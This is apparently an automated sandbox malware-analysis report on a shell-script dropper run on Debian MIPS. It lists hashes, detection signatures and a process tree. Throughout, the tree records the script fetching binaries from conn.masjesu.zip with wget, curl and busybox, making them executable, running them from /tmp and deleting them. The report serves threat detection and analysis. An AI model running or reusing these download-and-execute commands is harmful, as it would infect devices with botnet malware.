Analysis

  • max time kernel
    79s
  • max time network
    81s
  • platform
    debian-9_mips
  • resource
    debian9-mipsbe-20240611-en
  • resource tags

    arch:mipsimage:debian9-mipsbe-20240611-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipssystem
  • submitted
    29/10/2024, 02:30

General

  • Target

    754972bec007493d2c80bb80e68340689d10e492c7747fc68b085746b799ca0a.sh

  • Size

    10KB

  • MD5

    d41afa47fc6a06a1cfb7b25f1b6510db

  • SHA1

    1ef345877ccc2780055713bec262b92657b1e4a1

  • SHA256

    754972bec007493d2c80bb80e68340689d10e492c7747fc68b085746b799ca0a

  • SHA512

    5ce676421868d2fd93aaf0307d70c8f856c56a53859c0275e01f4c1fe15644ee25c18c06208b6e0a579333df7622d73b330cf65c898bb939f2f4fd773f4de320

  • SSDEEP

    96:YlFdLqi3SYL4L5RK/VV1oLDfVVjV/VBziTzDYmLxi2mDxTvni6iUpBYKCak8LHbN:SI6/2FO1Y0q0/cl1GC

Malware Config

Signatures

  • File and Directory Permissions Modification 1 TTPs 28 IoCs

    Adversaries may modify file or directory permissions to evade defenses.

  • Executes dropped EXE 28 IoCs
  • Reads runtime system information 28 IoCs

    Reads data from /proc virtual filesystem.

  • System Network Configuration Discovery 1 TTPs 64 IoCs

    Adversaries may gather information about the network configuration of a system.

  • Writes file to tmp directory 28 IoCs

    Malware often drops required files in the /tmp directory.

Processes

  • /tmp/754972bec007493d2c80bb80e68340689d10e492c7747fc68b085746b799ca0a.sh
    /tmp/754972bec007493d2c80bb80e68340689d10e492c7747fc68b085746b799ca0a.sh
    1⤵
      PID:707
      • /bin/rm
        /bin/rm bins.sh
        2⤵
          PID:710
        • /usr/bin/wget
          wget http://conn.masjesu.zip/bins/QoytKCAQ0cz4uhjX32S7p0QdgX4xNhIKQA
          2⤵
          • System Network Configuration Discovery
          PID:716
        • /usr/bin/curl
          curl -O http://conn.masjesu.zip/bins/QoytKCAQ0cz4uhjX32S7p0QdgX4xNhIKQA
          2⤵
          • Reads runtime system information
          • Writes file to tmp directory
          PID:731
        • /bin/busybox
          /bin/busybox wget http://conn.masjesu.zip/bins/QoytKCAQ0cz4uhjX32S7p0QdgX4xNhIKQA
          2⤵
          • System Network Configuration Discovery
          PID:736
        • /bin/chmod
          chmod 777 QoytKCAQ0cz4uhjX32S7p0QdgX4xNhIKQA
          2⤵
          • File and Directory Permissions Modification
          PID:738
        • /tmp/QoytKCAQ0cz4uhjX32S7p0QdgX4xNhIKQA
          ./QoytKCAQ0cz4uhjX32S7p0QdgX4xNhIKQA
          2⤵
          • Executes dropped EXE
          PID:739
        • /bin/rm
          rm QoytKCAQ0cz4uhjX32S7p0QdgX4xNhIKQA
          2⤵
            PID:740
          • /usr/bin/wget
            wget http://conn.masjesu.zip/bins/BPkR3cVjrrQqE51A3wogye3iax1ujJBIkQ
            2⤵
            • System Network Configuration Discovery
            PID:741
          • /usr/bin/curl
            curl -O http://conn.masjesu.zip/bins/BPkR3cVjrrQqE51A3wogye3iax1ujJBIkQ
            2⤵
            • Reads runtime system information
            • System Network Configuration Discovery
            • Writes file to tmp directory
            PID:742
          • /bin/busybox
            /bin/busybox wget http://conn.masjesu.zip/bins/BPkR3cVjrrQqE51A3wogye3iax1ujJBIkQ
            2⤵
            • System Network Configuration Discovery
            PID:744
          • /bin/chmod
            chmod 777 BPkR3cVjrrQqE51A3wogye3iax1ujJBIkQ
            2⤵
            • File and Directory Permissions Modification
            PID:745
          • /tmp/BPkR3cVjrrQqE51A3wogye3iax1ujJBIkQ
            ./BPkR3cVjrrQqE51A3wogye3iax1ujJBIkQ
            2⤵
            • Executes dropped EXE
            PID:746
          • /bin/rm
            rm BPkR3cVjrrQqE51A3wogye3iax1ujJBIkQ
            2⤵
              PID:747
            • /usr/bin/wget
              wget http://conn.masjesu.zip/bins/37ioBDRWlxAa1eAUA7tKu2CGSbZMId4D5F
              2⤵
              • System Network Configuration Discovery
              PID:748
            • /usr/bin/curl
              curl -O http://conn.masjesu.zip/bins/37ioBDRWlxAa1eAUA7tKu2CGSbZMId4D5F
              2⤵
              • Reads runtime system information
              • System Network Configuration Discovery
              • Writes file to tmp directory
              PID:749
            • /bin/busybox
              /bin/busybox wget http://conn.masjesu.zip/bins/37ioBDRWlxAa1eAUA7tKu2CGSbZMId4D5F
              2⤵
              • System Network Configuration Discovery
              PID:751
            • /bin/chmod
              chmod 777 37ioBDRWlxAa1eAUA7tKu2CGSbZMId4D5F
              2⤵
              • File and Directory Permissions Modification
              PID:752
            • /tmp/37ioBDRWlxAa1eAUA7tKu2CGSbZMId4D5F
              ./37ioBDRWlxAa1eAUA7tKu2CGSbZMId4D5F
              2⤵
              • Executes dropped EXE
              PID:754
            • /bin/rm
              rm 37ioBDRWlxAa1eAUA7tKu2CGSbZMId4D5F
              2⤵
                PID:757
              • /usr/bin/wget
                wget http://conn.masjesu.zip/bins/VrdtsdONomvSuZRzqVh86PXBLSsdj7hNCw
                2⤵
                  PID:759
                • /usr/bin/curl
                  curl -O http://conn.masjesu.zip/bins/VrdtsdONomvSuZRzqVh86PXBLSsdj7hNCw
                  2⤵
                  • Reads runtime system information
                  • Writes file to tmp directory
                  PID:769
                • /bin/busybox
                  /bin/busybox wget http://conn.masjesu.zip/bins/VrdtsdONomvSuZRzqVh86PXBLSsdj7hNCw
                  2⤵
                  • System Network Configuration Discovery
                  PID:779
                • /bin/chmod
                  chmod 777 VrdtsdONomvSuZRzqVh86PXBLSsdj7hNCw
                  2⤵
                  • File and Directory Permissions Modification
                  PID:783
                • /tmp/VrdtsdONomvSuZRzqVh86PXBLSsdj7hNCw
                  ./VrdtsdONomvSuZRzqVh86PXBLSsdj7hNCw
                  2⤵
                  • Executes dropped EXE
                  PID:785
                • /bin/rm
                  rm VrdtsdONomvSuZRzqVh86PXBLSsdj7hNCw
                  2⤵
                    PID:788
                  • /usr/bin/wget
                    wget http://conn.masjesu.zip/bins/fucirO9jc55YVFSsXRn0D9lPHjWxYM8eO3
                    2⤵
                    • System Network Configuration Discovery
                    PID:789
                  • /usr/bin/curl
                    curl -O http://conn.masjesu.zip/bins/fucirO9jc55YVFSsXRn0D9lPHjWxYM8eO3
                    2⤵
                    • Reads runtime system information
                    • System Network Configuration Discovery
                    • Writes file to tmp directory
                    PID:796
                  • /bin/busybox
                    /bin/busybox wget http://conn.masjesu.zip/bins/fucirO9jc55YVFSsXRn0D9lPHjWxYM8eO3
                    2⤵
                    • System Network Configuration Discovery
                    PID:809
                  • /bin/chmod
                    chmod 777 fucirO9jc55YVFSsXRn0D9lPHjWxYM8eO3
                    2⤵
                    • File and Directory Permissions Modification
                    PID:812
                  • /tmp/fucirO9jc55YVFSsXRn0D9lPHjWxYM8eO3
                    ./fucirO9jc55YVFSsXRn0D9lPHjWxYM8eO3
                    2⤵
                    • Executes dropped EXE
                    PID:813
                  • /bin/rm
                    rm fucirO9jc55YVFSsXRn0D9lPHjWxYM8eO3
                    2⤵
                      PID:815
                    • /usr/bin/wget
                      wget http://conn.masjesu.zip/bins/5JRTubTwlCb5MsYhQIBF7LutQ2KuGK3UAP
                      2⤵
                      • System Network Configuration Discovery
                      PID:816
                    • /usr/bin/curl
                      curl -O http://conn.masjesu.zip/bins/5JRTubTwlCb5MsYhQIBF7LutQ2KuGK3UAP
                      2⤵
                      • Reads runtime system information
                      • System Network Configuration Discovery
                      • Writes file to tmp directory
                      PID:817
                    • /bin/busybox
                      /bin/busybox wget http://conn.masjesu.zip/bins/5JRTubTwlCb5MsYhQIBF7LutQ2KuGK3UAP
                      2⤵
                        PID:819
                      • /bin/chmod
                        chmod 777 5JRTubTwlCb5MsYhQIBF7LutQ2KuGK3UAP
                        2⤵
                        • File and Directory Permissions Modification
                        PID:820
                      • /tmp/5JRTubTwlCb5MsYhQIBF7LutQ2KuGK3UAP
                        ./5JRTubTwlCb5MsYhQIBF7LutQ2KuGK3UAP
                        2⤵
                        • Executes dropped EXE
                        PID:821
                      • /bin/rm
                        rm 5JRTubTwlCb5MsYhQIBF7LutQ2KuGK3UAP
                        2⤵
                          PID:823
                        • /usr/bin/wget
                          wget http://conn.masjesu.zip/bins/NxTSfzkq80NBAZ1Q0GwQZMMKlRbDSu0U6Q
                          2⤵
                          • System Network Configuration Discovery
                          PID:824
                        • /usr/bin/curl
                          curl -O http://conn.masjesu.zip/bins/NxTSfzkq80NBAZ1Q0GwQZMMKlRbDSu0U6Q
                          2⤵
                          • Reads runtime system information
                          • System Network Configuration Discovery
                          • Writes file to tmp directory
                          PID:825
                        • /bin/busybox
                          /bin/busybox wget http://conn.masjesu.zip/bins/NxTSfzkq80NBAZ1Q0GwQZMMKlRbDSu0U6Q
                          2⤵
                          • System Network Configuration Discovery
                          PID:830
                        • /bin/chmod
                          chmod 777 NxTSfzkq80NBAZ1Q0GwQZMMKlRbDSu0U6Q
                          2⤵
                          • File and Directory Permissions Modification
                          PID:831
                        • /tmp/NxTSfzkq80NBAZ1Q0GwQZMMKlRbDSu0U6Q
                          ./NxTSfzkq80NBAZ1Q0GwQZMMKlRbDSu0U6Q
                          2⤵
                          • Executes dropped EXE
                          PID:832
                        • /bin/rm
                          rm NxTSfzkq80NBAZ1Q0GwQZMMKlRbDSu0U6Q
                          2⤵
                            PID:834
                          • /usr/bin/wget
                            wget http://conn.masjesu.zip/bins/HY5C9VZAbh48jJzPSSlyqIuzn2A1PB7TeB
                            2⤵
                            • System Network Configuration Discovery
                            PID:835
                          • /usr/bin/curl
                            curl -O http://conn.masjesu.zip/bins/HY5C9VZAbh48jJzPSSlyqIuzn2A1PB7TeB
                            2⤵
                            • Reads runtime system information
                            • System Network Configuration Discovery
                            • Writes file to tmp directory
                            PID:836
                          • /bin/busybox
                            /bin/busybox wget http://conn.masjesu.zip/bins/HY5C9VZAbh48jJzPSSlyqIuzn2A1PB7TeB
                            2⤵
                            • System Network Configuration Discovery
                            PID:843
                          • /bin/chmod
                            chmod 777 HY5C9VZAbh48jJzPSSlyqIuzn2A1PB7TeB
                            2⤵
                            • File and Directory Permissions Modification
                            PID:847
                          • /tmp/HY5C9VZAbh48jJzPSSlyqIuzn2A1PB7TeB
                            ./HY5C9VZAbh48jJzPSSlyqIuzn2A1PB7TeB
                            2⤵
                            • Executes dropped EXE
                            PID:848
                          • /bin/rm
                            rm HY5C9VZAbh48jJzPSSlyqIuzn2A1PB7TeB
                            2⤵
                              PID:852
                            • /usr/bin/wget
                              wget http://conn.masjesu.zip/bins/gMHch4GjkkSXguAzcfaCqm5l4xcEum07N6
                              2⤵
                              • System Network Configuration Discovery
                              PID:853
                            • /usr/bin/curl
                              curl -O http://conn.masjesu.zip/bins/gMHch4GjkkSXguAzcfaCqm5l4xcEum07N6
                              2⤵
                              • Reads runtime system information
                              • System Network Configuration Discovery
                              • Writes file to tmp directory
                              PID:864
                            • /bin/busybox
                              /bin/busybox wget http://conn.masjesu.zip/bins/gMHch4GjkkSXguAzcfaCqm5l4xcEum07N6
                              2⤵
                                PID:874
                              • /bin/chmod
                                chmod 777 gMHch4GjkkSXguAzcfaCqm5l4xcEum07N6
                                2⤵
                                • File and Directory Permissions Modification
                                PID:877
                              • /tmp/gMHch4GjkkSXguAzcfaCqm5l4xcEum07N6
                                ./gMHch4GjkkSXguAzcfaCqm5l4xcEum07N6
                                2⤵
                                • Executes dropped EXE
                                PID:878
                              • /bin/rm
                                rm gMHch4GjkkSXguAzcfaCqm5l4xcEum07N6
                                2⤵
                                  PID:879
                                • /usr/bin/wget
                                  wget http://conn.masjesu.zip/bins/Z5OeGz4UzdFoRp0bpvnIbJxpime4WsU7Em
                                  2⤵
                                  • System Network Configuration Discovery
                                  PID:880
                                • /usr/bin/curl
                                  curl -O http://conn.masjesu.zip/bins/Z5OeGz4UzdFoRp0bpvnIbJxpime4WsU7Em
                                  2⤵
                                  • Reads runtime system information
                                  • System Network Configuration Discovery
                                  • Writes file to tmp directory
                                  PID:881
                                • /bin/busybox
                                  /bin/busybox wget http://conn.masjesu.zip/bins/Z5OeGz4UzdFoRp0bpvnIbJxpime4WsU7Em
                                  2⤵
                                  • System Network Configuration Discovery
                                  PID:883
                                • /bin/chmod
                                  chmod 777 Z5OeGz4UzdFoRp0bpvnIbJxpime4WsU7Em
                                  2⤵
                                  • File and Directory Permissions Modification
                                  PID:884
                                • /tmp/Z5OeGz4UzdFoRp0bpvnIbJxpime4WsU7Em
                                  ./Z5OeGz4UzdFoRp0bpvnIbJxpime4WsU7Em
                                  2⤵
                                  • Executes dropped EXE
                                  PID:885
                                • /bin/rm
                                  rm Z5OeGz4UzdFoRp0bpvnIbJxpime4WsU7Em
                                  2⤵
                                    PID:886
                                  • /usr/bin/wget
                                    wget http://conn.masjesu.zip/bins/hDVxKJgp0T26joiQOFIUa1agMX4wdvf2wZ
                                    2⤵
                                      PID:887
                                    • /usr/bin/curl
                                      curl -O http://conn.masjesu.zip/bins/hDVxKJgp0T26joiQOFIUa1agMX4wdvf2wZ
                                      2⤵
                                      • Reads runtime system information
                                      • System Network Configuration Discovery
                                      • Writes file to tmp directory
                                      PID:888
                                    • /bin/busybox
                                      /bin/busybox wget http://conn.masjesu.zip/bins/hDVxKJgp0T26joiQOFIUa1agMX4wdvf2wZ
                                      2⤵
                                      • System Network Configuration Discovery
                                      PID:890
                                    • /bin/chmod
                                      chmod 777 hDVxKJgp0T26joiQOFIUa1agMX4wdvf2wZ
                                      2⤵
                                      • File and Directory Permissions Modification
                                      PID:891
                                    • /tmp/hDVxKJgp0T26joiQOFIUa1agMX4wdvf2wZ
                                      ./hDVxKJgp0T26joiQOFIUa1agMX4wdvf2wZ
                                      2⤵
                                      • Executes dropped EXE
                                      PID:892
                                    • /bin/rm
                                      rm hDVxKJgp0T26joiQOFIUa1agMX4wdvf2wZ
                                      2⤵
                                        PID:894
                                      • /usr/bin/wget
                                        wget http://conn.masjesu.zip/bins/XRShpAHwaUtFsGm29nJnRPcANMtUxbsoMx
                                        2⤵
                                        • System Network Configuration Discovery
                                        PID:895
                                      • /usr/bin/curl
                                        curl -O http://conn.masjesu.zip/bins/XRShpAHwaUtFsGm29nJnRPcANMtUxbsoMx
                                        2⤵
                                        • Reads runtime system information
                                        • System Network Configuration Discovery
                                        • Writes file to tmp directory
                                        PID:896
                                      • /bin/busybox
                                        /bin/busybox wget http://conn.masjesu.zip/bins/XRShpAHwaUtFsGm29nJnRPcANMtUxbsoMx
                                        2⤵
                                        • System Network Configuration Discovery
                                        PID:898
                                      • /bin/chmod
                                        chmod 777 XRShpAHwaUtFsGm29nJnRPcANMtUxbsoMx
                                        2⤵
                                        • File and Directory Permissions Modification
                                        PID:899
                                      • /tmp/XRShpAHwaUtFsGm29nJnRPcANMtUxbsoMx
                                        ./XRShpAHwaUtFsGm29nJnRPcANMtUxbsoMx
                                        2⤵
                                        • Executes dropped EXE
                                        PID:900
                                      • /bin/rm
                                        rm XRShpAHwaUtFsGm29nJnRPcANMtUxbsoMx
                                        2⤵
                                          PID:902
                                        • /usr/bin/wget
                                          wget http://conn.masjesu.zip/bins/nT0dHeLzevvBCC3lK4lVTtURjmcaM4oTkD
                                          2⤵
                                          • System Network Configuration Discovery
                                          PID:903
                                        • /usr/bin/curl
                                          curl -O http://conn.masjesu.zip/bins/nT0dHeLzevvBCC3lK4lVTtURjmcaM4oTkD
                                          2⤵
                                          • Reads runtime system information
                                          • Writes file to tmp directory
                                          PID:904
                                        • /bin/busybox
                                          /bin/busybox wget http://conn.masjesu.zip/bins/nT0dHeLzevvBCC3lK4lVTtURjmcaM4oTkD
                                          2⤵
                                          • System Network Configuration Discovery
                                          PID:906
                                        • /bin/chmod
                                          chmod 777 nT0dHeLzevvBCC3lK4lVTtURjmcaM4oTkD
                                          2⤵
                                          • File and Directory Permissions Modification
                                          PID:907
                                        • /tmp/nT0dHeLzevvBCC3lK4lVTtURjmcaM4oTkD
                                          ./nT0dHeLzevvBCC3lK4lVTtURjmcaM4oTkD
                                          2⤵
                                          • Executes dropped EXE
                                          PID:908
                                        • /bin/rm
                                          rm nT0dHeLzevvBCC3lK4lVTtURjmcaM4oTkD
                                          2⤵
                                            PID:909
                                          • /usr/bin/wget
                                            wget http://conn.masjesu.zip/bins/DVVTZmZnENvEGfIsx6Ke5E1fkoBYtLXW9l
                                            2⤵
                                              PID:910
                                            • /usr/bin/curl
                                              curl -O http://conn.masjesu.zip/bins/DVVTZmZnENvEGfIsx6Ke5E1fkoBYtLXW9l
                                              2⤵
                                              • Reads runtime system information
                                              • Writes file to tmp directory
                                              PID:911
                                            • /bin/busybox
                                              /bin/busybox wget http://conn.masjesu.zip/bins/DVVTZmZnENvEGfIsx6Ke5E1fkoBYtLXW9l
                                              2⤵
                                              • System Network Configuration Discovery
                                              PID:913
                                            • /bin/chmod
                                              chmod 777 DVVTZmZnENvEGfIsx6Ke5E1fkoBYtLXW9l
                                              2⤵
                                              • File and Directory Permissions Modification
                                              PID:914
                                            • /tmp/DVVTZmZnENvEGfIsx6Ke5E1fkoBYtLXW9l
                                              ./DVVTZmZnENvEGfIsx6Ke5E1fkoBYtLXW9l
                                              2⤵
                                              • Executes dropped EXE
                                              PID:915
                                            • /bin/rm
                                              rm DVVTZmZnENvEGfIsx6Ke5E1fkoBYtLXW9l
                                              2⤵
                                                PID:916
                                              • /usr/bin/wget
                                                wget http://conn.masjesu.zip/bins/QoytKCAQ0cz4uhjX32S7p0QdgX4xNhIKQA
                                                2⤵
                                                  PID:917
                                                • /usr/bin/curl
                                                  curl -O http://conn.masjesu.zip/bins/QoytKCAQ0cz4uhjX32S7p0QdgX4xNhIKQA
                                                  2⤵
                                                  • Reads runtime system information
                                                  • System Network Configuration Discovery
                                                  • Writes file to tmp directory
                                                  PID:918
                                                • /bin/busybox
                                                  /bin/busybox wget http://conn.masjesu.zip/bins/QoytKCAQ0cz4uhjX32S7p0QdgX4xNhIKQA
                                                  2⤵
                                                  • System Network Configuration Discovery
                                                  PID:920
                                                • /bin/chmod
                                                  chmod 777 QoytKCAQ0cz4uhjX32S7p0QdgX4xNhIKQA
                                                  2⤵
                                                  • File and Directory Permissions Modification
                                                  PID:921
                                                • /tmp/QoytKCAQ0cz4uhjX32S7p0QdgX4xNhIKQA
                                                  ./QoytKCAQ0cz4uhjX32S7p0QdgX4xNhIKQA
                                                  2⤵
                                                  • Executes dropped EXE
                                                  PID:922
                                                • /bin/rm
                                                  rm QoytKCAQ0cz4uhjX32S7p0QdgX4xNhIKQA
                                                  2⤵
                                                    PID:923
                                                  • /usr/bin/wget
                                                    wget http://conn.masjesu.zip/bins/BPkR3cVjrrQqE51A3wogye3iax1ujJBIkQ
                                                    2⤵
                                                    • System Network Configuration Discovery
                                                    PID:924
                                                  • /usr/bin/curl
                                                    curl -O http://conn.masjesu.zip/bins/BPkR3cVjrrQqE51A3wogye3iax1ujJBIkQ
                                                    2⤵
                                                    • Reads runtime system information
                                                    • System Network Configuration Discovery
                                                    • Writes file to tmp directory
                                                    PID:925
                                                  • /bin/busybox
                                                    /bin/busybox wget http://conn.masjesu.zip/bins/BPkR3cVjrrQqE51A3wogye3iax1ujJBIkQ
                                                    2⤵
                                                      PID:927
                                                    • /bin/chmod
                                                      chmod 777 BPkR3cVjrrQqE51A3wogye3iax1ujJBIkQ
                                                      2⤵
                                                      • File and Directory Permissions Modification
                                                      PID:928
                                                    • /tmp/BPkR3cVjrrQqE51A3wogye3iax1ujJBIkQ
                                                      ./BPkR3cVjrrQqE51A3wogye3iax1ujJBIkQ
                                                      2⤵
                                                      • Executes dropped EXE
                                                      PID:929
                                                    • /bin/rm
                                                      rm BPkR3cVjrrQqE51A3wogye3iax1ujJBIkQ
                                                      2⤵
                                                        PID:930
                                                      • /usr/bin/wget
                                                        wget http://conn.masjesu.zip/bins/37ioBDRWlxAa1eAUA7tKu2CGSbZMId4D5F
                                                        2⤵
                                                        • System Network Configuration Discovery
                                                        PID:931
                                                      • /usr/bin/curl
                                                        curl -O http://conn.masjesu.zip/bins/37ioBDRWlxAa1eAUA7tKu2CGSbZMId4D5F
                                                        2⤵
                                                        • Reads runtime system information
                                                        • System Network Configuration Discovery
                                                        • Writes file to tmp directory
                                                        PID:932
                                                      • /bin/busybox
                                                        /bin/busybox wget http://conn.masjesu.zip/bins/37ioBDRWlxAa1eAUA7tKu2CGSbZMId4D5F
                                                        2⤵
                                                        • System Network Configuration Discovery
                                                        PID:934
                                                      • /bin/chmod
                                                        chmod 777 37ioBDRWlxAa1eAUA7tKu2CGSbZMId4D5F
                                                        2⤵
                                                        • File and Directory Permissions Modification
                                                        PID:935
                                                      • /tmp/37ioBDRWlxAa1eAUA7tKu2CGSbZMId4D5F
                                                        ./37ioBDRWlxAa1eAUA7tKu2CGSbZMId4D5F
                                                        2⤵
                                                        • Executes dropped EXE
                                                        PID:936
                                                      • /bin/rm
                                                        rm 37ioBDRWlxAa1eAUA7tKu2CGSbZMId4D5F
                                                        2⤵
                                                          PID:938
                                                        • /usr/bin/wget
                                                          wget http://conn.masjesu.zip/bins/VrdtsdONomvSuZRzqVh86PXBLSsdj7hNCw
                                                          2⤵
                                                          • System Network Configuration Discovery
                                                          PID:939
                                                        • /usr/bin/curl
                                                          curl -O http://conn.masjesu.zip/bins/VrdtsdONomvSuZRzqVh86PXBLSsdj7hNCw
                                                          2⤵
                                                          • Reads runtime system information
                                                          • Writes file to tmp directory
                                                          PID:940
                                                        • /bin/busybox
                                                          /bin/busybox wget http://conn.masjesu.zip/bins/VrdtsdONomvSuZRzqVh86PXBLSsdj7hNCw
                                                          2⤵
                                                          • System Network Configuration Discovery
                                                          PID:942
                                                        • /bin/chmod
                                                          chmod 777 VrdtsdONomvSuZRzqVh86PXBLSsdj7hNCw
                                                          2⤵
                                                          • File and Directory Permissions Modification
                                                          PID:943
                                                        • /tmp/VrdtsdONomvSuZRzqVh86PXBLSsdj7hNCw
                                                          ./VrdtsdONomvSuZRzqVh86PXBLSsdj7hNCw
                                                          2⤵
                                                          • Executes dropped EXE
                                                          PID:944
                                                        • /bin/rm
                                                          rm VrdtsdONomvSuZRzqVh86PXBLSsdj7hNCw
                                                          2⤵
                                                            PID:946
                                                          • /usr/bin/wget
                                                            wget http://conn.masjesu.zip/bins/fucirO9jc55YVFSsXRn0D9lPHjWxYM8eO3
                                                            2⤵
                                                            • System Network Configuration Discovery
                                                            PID:947
                                                          • /usr/bin/curl
                                                            curl -O http://conn.masjesu.zip/bins/fucirO9jc55YVFSsXRn0D9lPHjWxYM8eO3
                                                            2⤵
                                                            • Reads runtime system information
                                                            • Writes file to tmp directory
                                                            PID:948
                                                          • /bin/busybox
                                                            /bin/busybox wget http://conn.masjesu.zip/bins/fucirO9jc55YVFSsXRn0D9lPHjWxYM8eO3
                                                            2⤵
                                                              PID:950
                                                            • /bin/chmod
                                                              chmod 777 fucirO9jc55YVFSsXRn0D9lPHjWxYM8eO3
                                                              2⤵
                                                              • File and Directory Permissions Modification
                                                              PID:951
                                                            • /tmp/fucirO9jc55YVFSsXRn0D9lPHjWxYM8eO3
                                                              ./fucirO9jc55YVFSsXRn0D9lPHjWxYM8eO3
                                                              2⤵
                                                              • Executes dropped EXE
                                                              PID:952
                                                            • /bin/rm
                                                              rm fucirO9jc55YVFSsXRn0D9lPHjWxYM8eO3
                                                              2⤵
                                                                PID:953
                                                              • /usr/bin/wget
                                                                wget http://conn.masjesu.zip/bins/5JRTubTwlCb5MsYhQIBF7LutQ2KuGK3UAP
                                                                2⤵
                                                                • System Network Configuration Discovery
                                                                PID:954
                                                              • /usr/bin/curl
                                                                curl -O http://conn.masjesu.zip/bins/5JRTubTwlCb5MsYhQIBF7LutQ2KuGK3UAP
                                                                2⤵
                                                                • Reads runtime system information
                                                                • System Network Configuration Discovery
                                                                • Writes file to tmp directory
                                                                PID:955
                                                              • /bin/busybox
                                                                /bin/busybox wget http://conn.masjesu.zip/bins/5JRTubTwlCb5MsYhQIBF7LutQ2KuGK3UAP
                                                                2⤵
                                                                  PID:957
                                                                • /bin/chmod
                                                                  chmod 777 5JRTubTwlCb5MsYhQIBF7LutQ2KuGK3UAP
                                                                  2⤵
                                                                  • File and Directory Permissions Modification
                                                                  PID:958
                                                                • /tmp/5JRTubTwlCb5MsYhQIBF7LutQ2KuGK3UAP
                                                                  ./5JRTubTwlCb5MsYhQIBF7LutQ2KuGK3UAP
                                                                  2⤵
                                                                  • Executes dropped EXE
                                                                  PID:959
                                                                • /bin/rm
                                                                  rm 5JRTubTwlCb5MsYhQIBF7LutQ2KuGK3UAP
                                                                  2⤵
                                                                    PID:960
                                                                  • /usr/bin/wget
                                                                    wget http://conn.masjesu.zip/bins/NxTSfzkq80NBAZ1Q0GwQZMMKlRbDSu0U6Q
                                                                    2⤵
                                                                    • System Network Configuration Discovery
                                                                    PID:961
                                                                  • /usr/bin/curl
                                                                    curl -O http://conn.masjesu.zip/bins/NxTSfzkq80NBAZ1Q0GwQZMMKlRbDSu0U6Q
                                                                    2⤵
                                                                    • Reads runtime system information
                                                                    • Writes file to tmp directory
                                                                    PID:962
                                                                  • /bin/busybox
                                                                    /bin/busybox wget http://conn.masjesu.zip/bins/NxTSfzkq80NBAZ1Q0GwQZMMKlRbDSu0U6Q
                                                                    2⤵
                                                                    • System Network Configuration Discovery
                                                                    PID:964
                                                                  • /bin/chmod
                                                                    chmod 777 NxTSfzkq80NBAZ1Q0GwQZMMKlRbDSu0U6Q
                                                                    2⤵
                                                                    • File and Directory Permissions Modification
                                                                    PID:965
                                                                  • /tmp/NxTSfzkq80NBAZ1Q0GwQZMMKlRbDSu0U6Q
                                                                    ./NxTSfzkq80NBAZ1Q0GwQZMMKlRbDSu0U6Q
                                                                    2⤵
                                                                    • Executes dropped EXE
                                                                    PID:966
                                                                  • /bin/rm
                                                                    rm NxTSfzkq80NBAZ1Q0GwQZMMKlRbDSu0U6Q
                                                                    2⤵
                                                                      PID:967
                                                                    • /usr/bin/wget
                                                                      wget http://conn.masjesu.zip/bins/XRShpAHwaUtFsGm29nJnRPcANMtUxbsoMx
                                                                      2⤵
                                                                      • System Network Configuration Discovery
                                                                      PID:968
                                                                    • /usr/bin/curl
                                                                      curl -O http://conn.masjesu.zip/bins/XRShpAHwaUtFsGm29nJnRPcANMtUxbsoMx
                                                                      2⤵
                                                                      • Reads runtime system information
                                                                      • System Network Configuration Discovery
                                                                      • Writes file to tmp directory
                                                                      PID:969
                                                                    • /bin/busybox
                                                                      /bin/busybox wget http://conn.masjesu.zip/bins/XRShpAHwaUtFsGm29nJnRPcANMtUxbsoMx
                                                                      2⤵
                                                                        PID:971
                                                                      • /bin/chmod
                                                                        chmod 777 XRShpAHwaUtFsGm29nJnRPcANMtUxbsoMx
                                                                        2⤵
                                                                        • File and Directory Permissions Modification
                                                                        PID:972
                                                                      • /tmp/XRShpAHwaUtFsGm29nJnRPcANMtUxbsoMx
                                                                        ./XRShpAHwaUtFsGm29nJnRPcANMtUxbsoMx
                                                                        2⤵
                                                                        • Executes dropped EXE
                                                                        PID:973
                                                                      • /bin/rm
                                                                        rm XRShpAHwaUtFsGm29nJnRPcANMtUxbsoMx
                                                                        2⤵
                                                                          PID:974
                                                                        • /usr/bin/wget
                                                                          wget http://conn.masjesu.zip/bins/nT0dHeLzevvBCC3lK4lVTtURjmcaM4oTkD
                                                                          2⤵
                                                                          • System Network Configuration Discovery
                                                                          PID:975
                                                                        • /usr/bin/curl
                                                                          curl -O http://conn.masjesu.zip/bins/nT0dHeLzevvBCC3lK4lVTtURjmcaM4oTkD
                                                                          2⤵
                                                                          • Reads runtime system information
                                                                          • System Network Configuration Discovery
                                                                          • Writes file to tmp directory
                                                                          PID:976
                                                                        • /bin/busybox
                                                                          /bin/busybox wget http://conn.masjesu.zip/bins/nT0dHeLzevvBCC3lK4lVTtURjmcaM4oTkD
                                                                          2⤵
                                                                          • System Network Configuration Discovery
                                                                          PID:978
                                                                        • /bin/chmod
                                                                          chmod 777 nT0dHeLzevvBCC3lK4lVTtURjmcaM4oTkD
                                                                          2⤵
                                                                          • File and Directory Permissions Modification
                                                                          PID:979
                                                                        • /tmp/nT0dHeLzevvBCC3lK4lVTtURjmcaM4oTkD
                                                                          ./nT0dHeLzevvBCC3lK4lVTtURjmcaM4oTkD
                                                                          2⤵
                                                                          • Executes dropped EXE
                                                                          PID:980
                                                                        • /bin/rm
                                                                          rm nT0dHeLzevvBCC3lK4lVTtURjmcaM4oTkD
                                                                          2⤵
                                                                            PID:982
                                                                          • /usr/bin/wget
                                                                            wget http://conn.masjesu.zip/bins/DVVTZmZnENvEGfIsx6Ke5E1fkoBYtLXW9l
                                                                            2⤵
                                                                            • System Network Configuration Discovery
                                                                            PID:983
                                                                          • /usr/bin/curl
                                                                            curl -O http://conn.masjesu.zip/bins/DVVTZmZnENvEGfIsx6Ke5E1fkoBYtLXW9l
                                                                            2⤵
                                                                            • Reads runtime system information
                                                                            • Writes file to tmp directory
                                                                            PID:984
                                                                          • /bin/busybox
                                                                            /bin/busybox wget http://conn.masjesu.zip/bins/DVVTZmZnENvEGfIsx6Ke5E1fkoBYtLXW9l
                                                                            2⤵
                                                                            • System Network Configuration Discovery
                                                                            PID:986
                                                                          • /bin/chmod
                                                                            chmod 777 DVVTZmZnENvEGfIsx6Ke5E1fkoBYtLXW9l
                                                                            2⤵
                                                                            • File and Directory Permissions Modification
                                                                            PID:987
                                                                          • /tmp/DVVTZmZnENvEGfIsx6Ke5E1fkoBYtLXW9l
                                                                            ./DVVTZmZnENvEGfIsx6Ke5E1fkoBYtLXW9l
                                                                            2⤵
                                                                            • Executes dropped EXE
                                                                            PID:988
                                                                          • /bin/rm
                                                                            rm DVVTZmZnENvEGfIsx6Ke5E1fkoBYtLXW9l
                                                                            2⤵
